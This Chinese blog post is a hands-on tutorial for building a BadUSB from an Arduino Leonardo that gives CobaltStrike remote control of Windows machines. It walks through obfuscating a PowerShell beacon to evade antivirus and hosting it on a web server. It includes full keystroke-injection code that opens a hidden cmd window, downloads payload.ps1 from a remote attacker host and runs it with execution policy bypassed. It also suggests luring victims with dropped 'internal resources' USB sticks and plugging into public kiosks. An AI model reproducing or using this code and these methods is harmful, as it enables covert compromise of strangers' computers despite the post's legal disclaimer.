BadUSB实现CobaltStrike快速上线
背景介绍
最近接触到各种钓鱼方法,研究到U盘钓鱼的时候,决定搞个BadUSB玩玩。BadUSB漏洞是由安全研究人员Karsten Nohl 和 Jakob Lell 在 2014 年黑帽会议上首次发现并暴露出来的,这也就让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。
就狭义来说,BadUSB是指形似 U 盘的设备,内部的电路在上电之后会被系统识别为键盘,此时该设备内部的芯片开始与电脑进行键盘通讯,仿照人的输入习惯,来操作电脑,以此达到骇入电脑的目的。
就广义来说,BadUSB是指一切会被电脑识别为 HID 设备的,外观却不像键盘的电子设备。现阶段有的 BadUSB是形似数据线的,有的则是手机加定制内核,以发挥 BadUSB 的作用,更有甚者,将 BadUSB 开发为模块,可以嵌入任意的带 USB 接口的设备中。
本文旨在交流技术,严禁从事不正当活动。网络不是法外之地,争做遵纪守法好公民。
实现工具及环境
- BadUSB Leonardo开发板
- Arduino IDE_v1.8.5
- CobaltStrike 4.0
- Server酱
- Ubuntu 20.04.4(CS服务端、木马服务器)、Windows10(CS客户端)、Windows10(受害者)
链接:https://pan.baidu.com/s/1UQI9GldqY8T3CIRrmDy7Pw
提取码:r1c4
复现步骤
前期准备
CobaltStrike启动服务端
./teamserver xxx.xxx.xxx 123456
CobaltStrike客户端登录,添加监听器
受害机为Windows系统,对于exe的木马会比较敏感,所以我们生成powershell的木马
保存在桌面命名为payload.ps1,查杀了一下被杀软过滤了,需要对这个马做一下免杀,PowerShell的免杀可以用Invoke-Obfuscation,进入目录执行powershell命令
set-executionpolicy remotesigned
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation
然后执行命令,指定待处理的Ps1文件
或者指定待处理的ps代码
set scriptpath c:\xxx\payload.ps1
set scriptblock 'echo xss'
输入encoding并选择编码方式,比如1,这里我选择混淆两次ascii按两次1两次回车就完事儿了
导出免杀ps文件到指定路径
out C:\xxx\xxx.ps1
到这里简单的免杀完成了,将这个马放到远程服务器上备用,我们可以用以下命令启动内置的Apache服务器,使受害者可以下载木马。访问可以看到服务器上的马
python2 -m SimpleHTTPServer [port]
or
python3 -m http.server [port]
烧录制作
下面我们可以进行badusb开发板的烧录
将硬件插入电脑,查看一下对应端口
打开Arduino IDE,工具->板->选择”Arduino Leonardo”和对应端口
将以下代码粘贴到arduino
#include<Keyboard.h>
void setup() {
// putpower shell your setup code here, to run once
Keyboard.begin();//开始键盘通讯
delay(3000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD /q /d /f:off /v:on /k MODE con: cols=15 lines=1"); //无回显
//Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\""); //有回显
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(2000);
Keyboard.println("powershell\n");
Keyboard.println("$clnt = new-object system.net.webclient;\n");
Keyboard.println("$url= 'http://xxx.xxx.xxx:xxxx/payload.ps1';\n"); //远程服务器ps1远控地址
Keyboard.println("$file = 'd:\\xxx.ps1';\n"); //下载到目标存放文件的地址
Keyboard.println("$clnt.downloadfile($url,$file)\n"); //采用分段执行绕过防火墙进程防护
Keyboard.println("powershell.exe -executionpolicy bypass -file d:\\xxx.ps1"); //本地权限绕过执行木马脚本
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop() {
// put your main code here, to run repeatedly:
}
代码大体意思:
- 插入BadUsb后等待3秒
- 按下Windows+R
- 切换大写绕开输入法
- 模拟输入字符串,最小化打开cmd窗口
- 隐藏输入特定命令,下载远控并调用powershell执行
进行烧录程序,先点击第一个编译按钮,无误以后点击第二个进行烧录,等下面的进度条跑完,提示完成
上线测试
电脑插入BadUSB,桌面会有些许痕迹,会有一个很小的cmd窗口,放大里边没任何内容,可以看到杀软也可以免杀
很快啊,CobaltStrike发现上线
结合Server酱很方便,可以把上线通知发到微信
攻击场景
1.社工攻击
把BadUSB放到一些显眼的地方或者放在地上装有人不小心掉了,可以在表面贴一些贴纸或者写着“内部资源”、“个人资料”等标签,引诱受害者插入电脑
2.带有USB的终端机
各场所终端机器,找到USB接口怼进去,有许多是Windows系统,比如一些自助取票机
小伙伴们可以根据文章自行复现,但是千万不要做违法的行为哦!
参考文章
BadUSB简单免杀一秒上线CobaltStrike
badusb的初步探索(针对windows研究)
物理渗透战士:教你如何使用BadUSB配合CS免杀实现上线
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 一个费力不讨好的项目,让我损失了近一半的绩效!
· 清华大学推出第四讲使用 DeepSeek + DeepResearch 让科研像聊天一样简单!
· 实操Deepseek接入个人知识库
· CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比
· Plotly.NET 一个为 .NET 打造的强大开源交互式图表库